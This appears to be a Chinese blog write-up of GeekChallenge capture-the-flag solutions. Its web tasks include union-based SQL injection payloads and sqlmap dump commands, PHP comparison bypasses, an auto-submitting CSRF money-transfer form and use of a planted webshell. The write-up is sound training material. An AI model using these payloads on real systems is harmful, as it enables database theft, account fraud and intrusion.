当前位置: 首页 > news >正文

GeekChallenge

2.GeekChallenge

1.web

1.朋友的学妹

url:http://49.234.224.119:7413/

右键点击查看源码,找到flag=U1lDe0YxQF80c19oNExwZnVsbGxsbGx9

在这里插入图片描述

然后base64解码得到SYC{F1@_4s_h4Lpfullllll}

在这里插入图片描述

2.EZwww

url:http://47.100.46.169:3901/

根据网站提示备份是个好习惯,猜测可以进行敏感文件扫描

在此使用御剑,发现www.zip文件

在这里插入图片描述

访问该文件下载并解压得到flag文件

在这里插入图片描述

打开得到flag:SYC{th1s_1s_4_f4ke_fl4g},这个falg是错误的

在这里插入图片描述

打开index.php文件,审计代码发现

在这里插入图片描述

这段代码的意思是对该段字符串”c3ljbDB2ZXI=“进行base64解码,结果为sycl0ver,并且以post的方式提交数据a=sycl0ver,

在这里插入图片描述

即可得到正确的flag:SYC{Backup_1s_4_good_h4bit_l0l}

在这里插入图片描述

3.刘壮的黑页

url :http://106.54.75.217:8080/

访问该网站,根据提示”你听说过请求方式吗“,可以判断跟GET/POST请求有关

往下翻查看源代码

在这里插入图片描述

这段代码的意思是当用GET方式提交admin值为username参数,用POST方式提交syclover值为password参数时,就会输出flag

在这里插入图片描述

得到flag为SYC{d0_y0u_k0nw_GET?}

在这里插入图片描述

4.欢迎

url:http://49.234.224.119:8000/

根据提示知道不能用GET请求,所以我们可以用burp抓包,修改为POST请求,放包

在这里插入图片描述

得到一段源代码,审查该代码

在这里插入图片描述

此段代码是shal加密函数绕过,意思是说需要提交的参数

前一句roam1与roam2的值或者类型不相同

后一句roam1与roam2的值和类型都相同

参考

x !== y绝对不等于如果 x 不等于 y,或它们类型不相同,则返回 true5!==“5” 返回 true
x === y绝对等于如果 x 等于 y,且它们类型相同,则返回 true5===“5” 返回 false

因为在php中sha1函数无法处理数组,当处理数组时会返回false

两者都为false即可绕过强比较

在这里插入图片描述

构造语句,POST方式提交

roam1[]=1&roam2[]=2

在这里插入图片描述

得到phpinfo页面,搜索,发现这个文件有问题f1444aagggg.php

在这里插入图片描述

通过burp,使用POST方式,访问该文件得到flag:SYC{w31c0m3_t0_5yc_r0@m_php1}

在这里插入图片描述

5.EZgit

url:http://47.100.46.169:3902/

根据提示,本题与git文件泄露有关

下载GitHack-master,使用GitHack.py进行扫描目标网站(注意:这个脚本只能使用python2运行,python3无法运行)

在这里插入图片描述

然而并没有得到正确flag

在这里插入图片描述

访问http://47.100.46.169:3902/.git/

后来知道是git版本错误,更换工具Git_Extract-master

kali里输入:

git clone https://github.com/style-404/Git_Extract.git

在这里插入图片描述

cd Git_Extract

dir

在这里插入图片描述

python2 git_extract.py http://47.100.46.169:3902/.git/

在这里插入图片描述

得到flag:SYC{I_l0ve_sycl0ver_l0l}

在这里插入图片描述

6.我是大黑客

url:http://39.106.144.160:100/

访问网页,发现liuzhuang.php.bak文件

在这里插入图片描述

浏览器访问该文件

在这里插入图片描述

下载下来打开,是一句话木马

在这里插入图片描述

浏览器访问http://39.106.144.160:100/liuzhuang.php

使用蚁剑进行连接,打开终端

cd …/…/退出到根目录

find flag查找flag文件

cat flag查看flag文件得到flag:SYC{1iuzHuang_yyd_G0d!}

在这里插入图片描述

7.ezbypass

url:http://49.234.224.119:7417/

浏览页面,根据提示要以GET方式提交a和b两个变量,并且与strcmp的值比较,并让strcmp返回NULL值

在这里插入图片描述

注意a和b不能相等

strcmp()函数只有在相等的情况下返回0。 当strcmp函数比较出错的时候就会返回NULL(也就是0)值

构造url:http://49.234.224.119:7417/?a=1&b=2

在这里插入图片描述

努力,构造url:http://49.234.224.119:7417/?a[]=1&b=2

在这里插入图片描述

根据提示,以POST方式提交一个不是数字的变量c=123a

php弱比较(==) 若字符串以数字开头,则取开头数字作为转换结果,若无则输出0

在这里插入图片描述

得到flag:SYC{php_4s_so_funny}

8.带恶人六撞

url:http://49.234.224.119:7415/

根据提示,数据库里有大家关于他的描述

与数据库有交互的地方就有可能产生SQL注入

第一种方式手注

直接构造?id=1页面正常

直接构造?id=1’页面报错

在这里插入图片描述

此处存在SQL注入

第一种方法,手注

判断字段数为4

?id=1’ order by 4-- q

在这里插入图片描述

判断回显点,我们可以在1,2,4处查询我们想要的内容

?id=-1’ union select 1,2,3,4-- q

在这里插入图片描述

查询数据库名为geek_sql

?id=-1’ union select 1,2,3,database()-- q

在这里插入图片描述

查询数据表名为blog,fllllag

?id=-1’ union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()-- q

在这里插入图片描述

查询fllllag表下的字段名为id,fllllllag

?id=-1’ union select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘fllllag’-- q

在这里插入图片描述

查询fllllllag字段的内容welcome_to_syclover,longlone_need_gf,得到SYC{liuzhuang_4s_@_G00d_m@n}

?id=-1’ union select 1,2,3,group_concat(fllllllag) from fllllag-- q

在这里插入图片描述

第二种方式sqlmap跑

查询数据库名为geek_sql

Sqlmap -u http://49.234.224.119:7415/?id=1 --dbs --batch

在这里插入图片描述

查询数据库geek_sql的数据表名为blog,fllllag

Sqlmap -u http://49.234.224.119:7415/?id=1 -D geek_sql --tables --batch

在这里插入图片描述

查询fllllag表下的字段名为id,fllllllag

Sqlmap -u http://49.234.224.119:7415/?id=1 -D geek_sql -T fllllag --columns --batch

在这里插入图片描述

查询fllllllag字段的内容welcome_to_syclover,longlone_need_gf,得到SYC{liuzhuang_4s_@_G00d_m@n}

Sqlmap -u http://49.234.224.119:7415/?id=1 -D geek_sql -T fllllag -C fllllllag --dump --batch

在这里插入图片描述

9.flagshop

url:http://173.82.206.142:8005/index.php

根据提示使用用admin账号登录,盲猜密码admin,成功,也可用burp爆破

在这里插入图片描述

在主页的flag商店页面,下拉,点击购买flag的链接

在这里插入图片描述

考点:csrf(跨站脚本攻击)

在这里插入图片描述

提示:

没有sessionid!别想当管理员(机器人?)

你知道csrf吗?

通过提示知道不需要通过伪造session来成为管理获得钱

进入页面,进行登录注册到达主页

在这里插入图片描述

可以看到购买flag需要10000M

在这里插入图片描述

可以通过Longlone(财务部部长)账户进行突破

跳转到报告页面

在这里插入图片描述

可以看到这里是普通用户和Longlone用户可以交互的地方

当我们提交报告中有链接时,他就会点击链接

这时候就要构造csrf来进行金币盗取

在这里插入图片描述

查看表单信息

验证码通过python脚本撞md5得到

import hashlibfor i in range(9999999):md5_ins = hashlib.md5((str(i)).encode('utf-8'))a=md5_ins.hexdigest()if a[:5] == "6d996":print(i)break

在这里插入图片描述

构造csrf脚本

<html><!-- CSRF PoC - generated by Burp Suite Professional --><body><script>history.pushState('', '', '/')</script><form action="http://173.82.206.142:8005/transfer.php" method="POST" enctype="multipart/form-data"><input type="hidden" name="target" value="re1wn" /><input type="hidden" name="money" value="100000000000000000000000000000" /><input type="hidden" name="messages" value="nihao" /><input type="submit" value="Submit request" id="click"/></form><script type="text/javascript">document.getElementById("click").click();</script></body>
</html>

提交到自己的服务器上,在将链接通过报告提交

过一会就会得到自己需要的钱,直接购买flag即可

得到flag:SYC{cross_s1t3_r3q43st_4orgery_1s_44nny}

在这里插入图片描述

10.忏悔的刘壮

漏洞url: http://120.79.197.4:5000/do_answer

考点:爬虫

题目,每次选择一个选项有1/6概率成功

当一次失败后又会重新累计忏悔次数

在这里插入图片描述

查看请求头,知道了每次get访问时cookie中就有答案

在这里插入图片描述

写出爬虫脚本带着cookie中的答案多次提交

import requestsdef request_func(req):request_n = request.post("http://120.79.197.4:5000/check",data=req.cookies)print(request_n.text)return request_nrequest = requests.session()
req = request.get("http://120.79.197.4:5000/")
req2 = request.post("http://120.79.197.4:5000/check",data=req.cookies)
print(req2.text)
need_req = request_func(req2)
i = 0
while i < 20:i += 1need_req = request_func(need_req)

在20次忏悔后得到了flag

SYC{this_is_your_flag}

在这里插入图片描述

2.Misc

2.壮言壮语

根据题目给出的信息

佛曰:豆梵能佛冥謹沙怯隸道等孕喝伽訶恐奢耶尼殿怯怖奢三缽南怛缽娑皤寫數皤究呐者醯皤勝孕皤顛皤耶夜哆悉侄羯涅悉怯老若俱勝菩知菩所蘇奢以梵世心亦呐耨夷哆至哆醯即波怯明除怯闍怯集怯尼明皤實怯一心缽呼侄羯夢室諳耨呐提迦梵都都呐孕礙諳那呐彌豆缽智遮諳槃提伽俱穆離冥伊冥那藐罰摩迦諳有諳盡即怯多逝侄婆冥涅神

可以猜测是佛文解密,利用在线网站

http://www.keyfc.net/bbs/tools/tudoucode.aspx

将解码的密文放在下面框里,点击"参悟佛所言的真意"

得到flag:SYC{i_l0ve_Japanese_wife}

在这里插入图片描述

3.Crypto

2.铠甲与萨满

根据提示,猜测是凯撒密码,利用在线解密网站

http://www.atoolbox.net/Tool.php?Id=778

对密文进行解密,解密两次,得到flag:SYC{liuzhuangliuzhuang_bangbangbang}

在这里插入图片描述

文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。

免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。

转载声明:儒道易行 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章的内容,不得以任何方式将其用于商业目的。

博客:
https://rdyx0.github.io/

先知社区:
https://xz.aliyun.com/u/37846

SecIN:
https://www.sec-in.com/author/3097

CSDN:
https://blog.csdn.net/weixin_48899364?type=blog

公众号:
https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirect

FreeBuf:
https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85

相关文章:

GeekChallenge

2.GeekChallenge 1.web 1.朋友的学妹 url&#xff1a;http://49.234.224.119:7413/ 右键点击查看源码&#xff0c;找到flagU1lDe0YxQF80c19oNExwZnVsbGxsbGx9 然后base64解码得到SYC{F1_4s_h4Lpfullllll} 2.EZwww url&#xff1a;http://47.100.46.169:3901/ 根据网站提示…...

Java文件IO

文章目录Java中的文件操作File常用构造方法方法文件内容的读写——数据流InputStreamFileInputStream利用Scanner进行字符读取OutputStreamPrintWriter按字符读取文件(FileReader)练习代码实例如何按字节进行数据读如何按字节进行数据写如何按字符进行数据读如何按字符进行数据…...

useSSL使用安全套接字协议(史上最全最详细)

useSSL使用安全套接字协议&#xff08;史上最全最详细&#xff09; SSL即为&#xff1a;Secure Sockets Layer 安全套接字协议。 useSSLfalse和useSSLtrue的区别&#xff1a; 在MySQL进行连接时&#xff1a; 如果MySQL的版本是5.7之后的版本必须要加上useSSLfalse&#xff0c…...

面向对象复习(2)

面向对象(2) 对象与引用 java语言中除基本类型之外的变量都称之为引用类型 java中的对象时通过引用对其操作的 Car bm new Car(); 右边的new Car是以Car类为模板,调用无参构造函数,在堆空间中创建一个Car对象 左边的Car bm 在栈中创建了一个Car类型的引用变量,所谓Car的…...

python中使用numpy包的向量矩阵相乘

一直对np的线性运算不太清晰&#xff0c;正好上课讲到了&#xff0c;做一个笔记整个理解一下 1.向量和矩阵 在numpy中&#xff0c;一重方括号表示的是向量vector&#xff0c;vector没有行列的概念。二重方括号表示矩阵matrix&#xff0c;有行列。 代码显示如下&#xff1a; …...

ElasticSearch 学习(一)

目录一、Elasticsearch 简介二、Elasticsearch 发展史三、Elasticsearch 功能四、Elasticsearch 特点五、Elasticsearch 应用场景一、Elasticsearch 简介 Elasticsearch 是一个实时的分布式搜索分析引擎&#xff0c;它能让你以前所未有的速度和规模&#xff0c;去探索你的数据…...

【新】华为OD机试 - 交换字符(Python)| 刷完获取OD招聘渠道

交换字符 题目 给定一个字符串 S 变化规则: 交换字符串中任意两个不同位置的字符 M S 都是小写字符组成 1 <= S.length <= 1000 输入 一串小写字母组成的字符串 输出 按照要求变换得到最小字符串 示例一 输入 abcdef输出 abcdef示例二 输入 bcdefa输出 acde…...

手把手教你解决传说中的NPE空指针异常

1. 前言最近有好几个初学java的小伙伴&#xff0c;甚至是学习到了JavaWeb、框架阶段的小伙伴也跑来问壹哥&#xff0c;该如何解决Java中的NullPointerException空指针异常。因为NPE是初学者特别常见的典型异常&#xff0c;所以壹哥在这里专门写一篇文章&#xff0c;来手把手地教…...

【pytorch安装】conda安装pytorch无法安装cpu版本(完整解决过程)

问题描述 在安装pytorch过程中&#xff0c;发现最后验证torch时总是返回结果为False&#xff0c;结果翻上去发现自己安装的是cpu版本的。 然后又通过conda去更换不同版本尝试&#xff0c;发现都是cpu版本的。 问题分析 通过conda安装pytorch是从源中搜索匹配指令中的文件&am…...

云计算ACP云服务器ECS实例题库

&#x1f618;作者简介&#xff1a;一名99年软件运维应届毕业生&#xff0c;正在自学云计算课程。&#x1f44a;宣言&#xff1a;人生就是B&#xff08;birth&#xff09;和D&#xff08;death&#xff09;之间的C&#xff08;choise&#xff09;&#xff0c;做好每一个选择。&…...

面试题:作用域、变量提升、块级作用域、函数作用域、暂存性死区、var和let的区别

<script>var a 10;(function () {console.log(a)a 5console.log(window.a)var a 20;console.log(a)})() </script> 上述代码&#xff1a; 1、主要是涉及到变量提升和函数作用域&#xff0c;var a20这行代码会在函数作用域中提升var a 至最顶部&#xf…...

JAVA练习49-爬楼梯

提示&#xff1a;文章写完后&#xff0c;目录可以自动生成&#xff0c;如何生成可参考右边的帮助文档 目录 前言 一、题目-爬楼梯 1.题目描述 2.思路与代码 2.1 思路 2.2 代码 总结 前言 提示&#xff1a;这里可以添加本文要记录的大概内容&#xff1a; 2月13日练习内容…...

深兰科技机器人商丘制造基地正式投产,助力商丘经济高质量发展

2月9日&#xff0c;深兰科技机器人商丘制造基地投产仪式在商丘市梁园区北航创新园隆重举行。商丘市人大常委会副主任、梁园区委书记张兵&#xff0c;梁园区区长薛天江、河南省装备制造业协会会长张桦&#xff0c;河南省机器人行业协会会长王济昌&#xff0c;深兰科技集团董事长…...

ES倒排索引/查询、写入流程

ES学习笔记 Elasticsearch学习笔记_巨輪的博客-CSDN博客 Elasticsearch学习之图解Elasticsearch中的_source、_all、store和index属性_BUse的博客-CSDN博客 倒排索引 倒排索引&#xff1a;ES倒排索引底层原理及FST算法的实现过程_es fst_Elastic开源社区的博客-CSDN博客 【…...

2023软考考哪个证书好?

软考有三个级别&#xff08;初级&#xff0c;中级和高级&#xff09;&#xff0c;这三个级别分别对应5个方向&#xff0c;下面这张图片呢&#xff0c;可以一目了然&#xff0c;一些小小建议&#xff01;&#xff01;&#xff01;遵循一个原则&#xff1a;首先选专业对口的科目&…...

一般人我劝你不要自学软件测试!!!

本人5年测试经验&#xff0c;在学测试之前对电脑的认知也就只限于上个网&#xff0c;玩个办公软件。这里不能跑题&#xff0c;我为啥说&#xff1a;自学软件测试&#xff0c;一般人我还是劝你算了吧&#xff1f;因为我就是那个一般人&#xff01; 软件测试基础真的很简单&…...

docker/docker-compose 安装mysql5.7

目录使用docker安装mysql5.7docker普通安装docker生产环境安装使用docker-compose 安装注意注意一:docker-compose权限问题注意二:docker pull 找不到镜像使用docker安装mysql5.7 docker普通安装 docker pull mysql:5.7 # 启动容器 docker run -p 3306:3306 --name mysql -e …...

【C++设计模式】学习笔记(6):Bridge 桥模式

目录 简介动机(Motivation)模式定义结构(Structure)要点总结笔记结语简介 Hello! 非常感谢您阅读海轰的文章,倘若文中有错误的地方,欢迎您指出~ ଘ(੭ˊᵕˋ)੭ 昵称:海轰 标签:程序猿|C++选手|学生 简介:因C语言结识编程,随后转入计算机专业,获得过国家奖学金…...

Allegro如何批量快速修改复用好的模块操作指导

Allegro如何批量快速修改复用好的模块操作指导 在做PCB设计的时候,相同模块可以用reuse复用的功能,可以大大提升效率,但是模块需要修改的时候,其它模块也要跟着修改,逐个再去复用一遍比较费时间,Allegro支持批量快速修改复用好的模块 前提是相同模块必须是相同的mdd文件…...

让我百思不得其解的infer究竟是怎么推导类型的?

情景再现 有这么一个条件类型的基本语法: T extends U ? X : Y; 如果占位符类型U是一个可以被分解成几个部分的类型&#xff0c;譬如数组类型&#xff0c;元组类型&#xff0c;函数类型&#xff0c;字符串字面量类型等。这时候就可以通过infer来获取U类型中某个部分的类型。 …...

Qwen2.5-72B-Instruct-GPTQ-Int4镜像定制:添加自定义工具函数与插件

Qwen2.5-72B-Instruct-GPTQ-Int4镜像定制&#xff1a;添加自定义工具函数与插件 1. 模型简介与部署验证 Qwen2.5-72B-Instruct-GPTQ-Int4是通义千问大模型系列的最新版本&#xff0c;在多个关键能力上实现了显著提升&#xff1a; 知识量与专业能力&#xff1a;特别强化了编程…...

OpenClaw技能市场巡礼:Top10 GLM-4.7-Flash增强模块推荐

OpenClaw技能市场巡礼&#xff1a;Top10 GLM-4.7-Flash增强模块推荐 1. 为什么需要关注技能市场&#xff1f; 第一次接触OpenClaw时&#xff0c;我以为它只是个简单的自动化工具。直到在ClawHub技能市场看到有人用GLM-4.7-Flash模型实现了简历自动打分系统&#xff0c;才意识…...

WinRAR v7.21 Beta1 - 高效文件压缩加密解压缩软件

WinRAR v7.21 Beta1 是适配 Windows 的经典解压缩软件&#xff0c;支持 RAR、ZIP 等多格式压缩解压&#xff0c;具备固实压缩、加密等功能&#xff0c;64 位优化版完成汉化与注册适配&#xff0c;操作便捷&#xff0c;是电脑文件管理的优质选择。WinRAR v7.21 Beta1 软件详情介…...

率零降AI工具新手教程:零基础也能快速降论文AIGC率

率零降AI工具新手教程&#xff1a;零基础也能快速降论文AIGC率 你可能已经听说了各种降AI工具&#xff0c;但打开网站看到一堆选项就头大。 这篇教程专门给"完全没用过降AI工具"的同学写。我选了操作最简单的率零来做演示——它的界面简洁到几乎不需要学习&#xff0…...

TensorRT C#封装库深度评测:比Python快多少?工业级模型部署实战(附性能对比)

TensorRT C#封装库工业级性能对决&#xff1a;量化实测与实战调优指南 当工业级应用遇上AI推理&#xff0c;毫秒级延迟差异可能意味着数百万的产线损失。本文将带您深入实测TensorRT C#封装库与Python原生接口的性能鸿沟&#xff0c;并揭示如何在高并发PLC系统中实现亚毫秒级稳…...

深度分析俩款主流移动统计工具Appvue和openinstall

深度分析俩款主流移动统计工具Appvue和openinstall Appvue vs. Openinstall&#xff1a;移动统计渠道的技术创新 在移动应用增长领域&#xff0c;渠道追踪和安装来源分析一直是开发者面临的核心挑战。传统渠道包模式存在效率低下、维护困难等痛点&#xff0c;而新兴的动态参数注…...

Axure隐藏技巧大公开:动态面板与热区的高级用法(含常见问题解决方案)

Axure隐藏技巧大公开&#xff1a;动态面板与热区的高级用法&#xff08;含常见问题解决方案&#xff09; 在原型设计领域&#xff0c;Axure RP早已超越了基础线框工具的角色&#xff0c;成为交互设计师手中的瑞士军刀。但许多用户在使用动态面板和热区时&#xff0c;往往只停留…...

如何让Flash内容重获新生?FlashPatch拯救过期浏览器插件的实战指南

如何让Flash内容重获新生&#xff1f;FlashPatch拯救过期浏览器插件的实战指南 【免费下载链接】FlashPatch FlashPatch! Play Adobe Flash Player games in the browser after January 12th, 2021. 项目地址: https://gitcode.com/gh_mirrors/fl/FlashPatch 一、价值定…...

Step3-VL-10B-Base与卷积神经网络结合:图像理解性能提升

Step3-VL-10B-Base与卷积神经网络结合&#xff1a;图像理解性能提升 在图像识别任务中&#xff0c;传统卷积神经网络&#xff08;CNN&#xff09;虽然擅长提取局部特征&#xff0c;但在处理复杂语义理解、多模态上下文推理等任务时往往表现有限。而视觉-语言大模型&#xff08…...

Kimi/豆包/DeepSeek生成的论文怎么降AI率?不同AI工具降AIGC策略详解

Kimi/豆包/DeepSeek生成的论文怎么降AI率&#xff1f;不同AI工具降AIGC策略详解 2026年初&#xff0c;一个新现象引起了高校老师们的注意&#xff1a;同一个班级的毕业论文&#xff0c;虽然题目各不相同&#xff0c;但读起来总有一种微妙的"相似感"。有些论文像是同一…...